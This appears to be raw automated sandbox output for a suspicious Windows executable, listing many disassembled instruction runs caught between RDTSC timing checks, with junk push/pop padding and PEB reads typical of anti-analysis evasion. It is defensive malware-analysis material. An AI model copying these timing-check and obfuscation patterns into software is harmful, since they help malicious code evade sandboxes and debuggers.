Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C8675 second address: 15C867B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C8833 second address: 15C8840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8C6CC64786h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168D7A8 second address: 168D7B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C6D17D0A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168D953 second address: 168D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8C6CC64797h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168D96F second address: 168D975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168D975 second address: 168D97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168D97B second address: 168D97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168DECF second address: 168DEFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jl 00007F8C6CC647A2h 0x00000010 jmp 00007F8C6CC64796h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168DEFD second address: 168DF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168DF04 second address: 168DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168E18C second address: 168E198 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C6D17D0AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 168E317 second address: 168E330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64793h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693B15 second address: 1693B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8C6D17D0A6h 0x0000000a popad 0x0000000b jmp 00007F8C6D17D0B6h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F8C6D17D0ADh 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693D16 second address: 1693D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693DE7 second address: 1693E01 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C6D17D0B2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693E01 second address: 1693E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693E19 second address: 1693E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 mov dword ptr [ebp+12456E19h], esi 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F8C6D17D0A8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b call 00007F8C6D17D0A9h 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F8C6D17D0B6h 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a pop edx 0x0000003b push eax 0x0000003c jmp 00007F8C6D17D0ACh 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 je 00007F8C6D17D0B4h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693E8E second address: 1693E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1693E92 second address: 1693EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jng 00007F8C6D17D0A6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1695A2A second address: 1695A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 jc 00007F8C6CC64786h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 169561F second address: 1695637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F8C6D17D0ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1697688 second address: 169768D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990046 second address: 7990084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007F8C6D17D0B8h 0x0000000c sub esi, 67A80788h 0x00000012 jmp 00007F8C6D17D0ABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov eax, 60FE4891h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990084 second address: 79900AD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8C6CC6478Eh 0x00000008 adc ax, E9E8h 0x0000000d jmp 00007F8C6CC6478Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bx, cx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79900AD second address: 79900B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79900B1 second address: 79900D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d jmp 00007F8C6CC6478Eh 0x00000012 sub esp, 18h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov si, 2863h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79900D6 second address: 79900F7 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8C6D17D0B8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dh, 1Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79900F7 second address: 7990146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 mov cl, 48h 0x0000000b pushad 0x0000000c mov al, bh 0x0000000e pushfd 0x0000000f jmp 00007F8C6CC64798h 0x00000014 or ch, 00000038h 0x00000017 jmp 00007F8C6CC6478Bh 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8C6CC64794h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990146 second address: 799014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799014C second address: 7990150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990150 second address: 7990154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990154 second address: 7990176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F8C6CC64792h 0x00000011 movzx ecx, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990176 second address: 799018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799018D second address: 79901CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 call 00007F8C6CC64798h 0x0000000a movzx eax, di 0x0000000d pop edi 0x0000000e popad 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C6CC64799h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79901CB second address: 79901EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C6D17D0ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79901EF second address: 7990223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F8C6CC64796h 0x0000000f mov esi, dword ptr [759B06ECh] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a mov bh, 25h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990223 second address: 7990229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990229 second address: 799027A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e mov di, si 0x00000011 pushfd 0x00000012 jmp 00007F8C6CC64798h 0x00000017 xor ecx, 56AA2668h 0x0000001d jmp 00007F8C6CC6478Bh 0x00000022 popfd 0x00000023 popad 0x00000024 jne 00007F8C6CC6562Ah 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799027A second address: 799027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799027E second address: 7990299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990299 second address: 79902BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, ax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79902BD second address: 7990338 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F8C6CC6478Bh 0x0000000d sub si, E46Eh 0x00000012 jmp 00007F8C6CC64799h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F8C6CC64791h 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 mov ecx, 261D6A83h 0x00000026 popad 0x00000027 call dword ptr [75980B60h] 0x0000002d mov eax, 75F3E5E0h 0x00000032 ret 0x00000033 pushad 0x00000034 mov cx, bx 0x00000037 call 00007F8C6CC64797h 0x0000003c mov si, 05BFh 0x00000040 pop eax 0x00000041 popad 0x00000042 push 00000044h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990338 second address: 799033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799033F second address: 799037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 3BC6374Ah 0x00000014 pushfd 0x00000015 jmp 00007F8C6CC6478Bh 0x0000001a sbb si, 39EEh 0x0000001f jmp 00007F8C6CC64799h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799037F second address: 79903AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 jmp 00007F8C6D17D0B3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C6D17D0B0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79903AF second address: 79903B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79903B5 second address: 79903D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C6D17D0AEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79903D8 second address: 799042E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F8C6CC64796h 0x0000000f push dword ptr [eax] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F8C6CC64798h 0x0000001a adc eax, 1AD962E8h 0x00000020 jmp 00007F8C6CC6478Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799042E second address: 799044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr fs:[00000030h] 0x0000000b pushad 0x0000000c call 00007F8C6D17D0B0h 0x00000011 mov ah, 0Fh 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799044F second address: 7990473 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push dword ptr [eax+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C6CC64797h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990473 second address: 7990479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990479 second address: 799047D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799050D second address: 799051F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799051F second address: 799054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8CDAC03907h 0x0000000e pushad 0x0000000f push edi 0x00000010 mov ebx, esi 0x00000012 pop esi 0x00000013 jmp 00007F8C6CC64795h 0x00000018 popad 0x00000019 sub eax, eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799054F second address: 799055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov ebx, 788535E8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79906BE second address: 79906D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64794h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79906D6 second address: 79906DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79906DA second address: 79906EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79906EB second address: 79906EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79906EF second address: 7990707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990707 second address: 7990719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990719 second address: 7990741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8C6CC64799h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990741 second address: 7990745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990745 second address: 799074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799074B second address: 7990750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990750 second address: 7990797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+5Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8C6CC64797h 0x00000016 sub ch, 0000005Eh 0x00000019 jmp 00007F8C6CC64799h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990797 second address: 799079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799079C second address: 79907EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c jmp 00007F8C6CC64796h 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8C6CC64797h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79907EC second address: 79907F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79907F2 second address: 79907F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79907F6 second address: 7990863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b pushad 0x0000000c mov esi, 038F06CFh 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+64h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F8C6D17D0B0h 0x0000001c sub esi, 61A7F978h 0x00000022 jmp 00007F8C6D17D0ABh 0x00000027 popfd 0x00000028 push eax 0x00000029 mov di, 1F9Ah 0x0000002d pop edi 0x0000002e popad 0x0000002f mov dword ptr [esi+28h], eax 0x00000032 jmp 00007F8C6D17D0AEh 0x00000037 mov eax, dword ptr [ebx+68h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8C6D17D0B7h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990863 second address: 7990869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990869 second address: 799086D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799086D second address: 799092D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8C6CC6478Dh 0x00000012 add ax, 1E26h 0x00000017 jmp 00007F8C6CC64791h 0x0000001c popfd 0x0000001d jmp 00007F8C6CC64790h 0x00000022 popad 0x00000023 mov ax, word ptr [ebx+6Ch] 0x00000027 jmp 00007F8C6CC64790h 0x0000002c mov word ptr [esi+30h], ax 0x00000030 pushad 0x00000031 mov dl, ch 0x00000033 pushfd 0x00000034 jmp 00007F8C6CC64793h 0x00000039 and esi, 6947A6BEh 0x0000003f jmp 00007F8C6CC64799h 0x00000044 popfd 0x00000045 popad 0x00000046 mov ax, word ptr [ebx+00000088h] 0x0000004d jmp 00007F8C6CC6478Eh 0x00000052 mov word ptr [esi+32h], ax 0x00000056 pushad 0x00000057 mov edx, ecx 0x00000059 mov esi, 31B539C9h 0x0000005e popad 0x0000005f mov eax, dword ptr [ebx+0000008Ch] 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799092D second address: 7990931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990931 second address: 7990937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
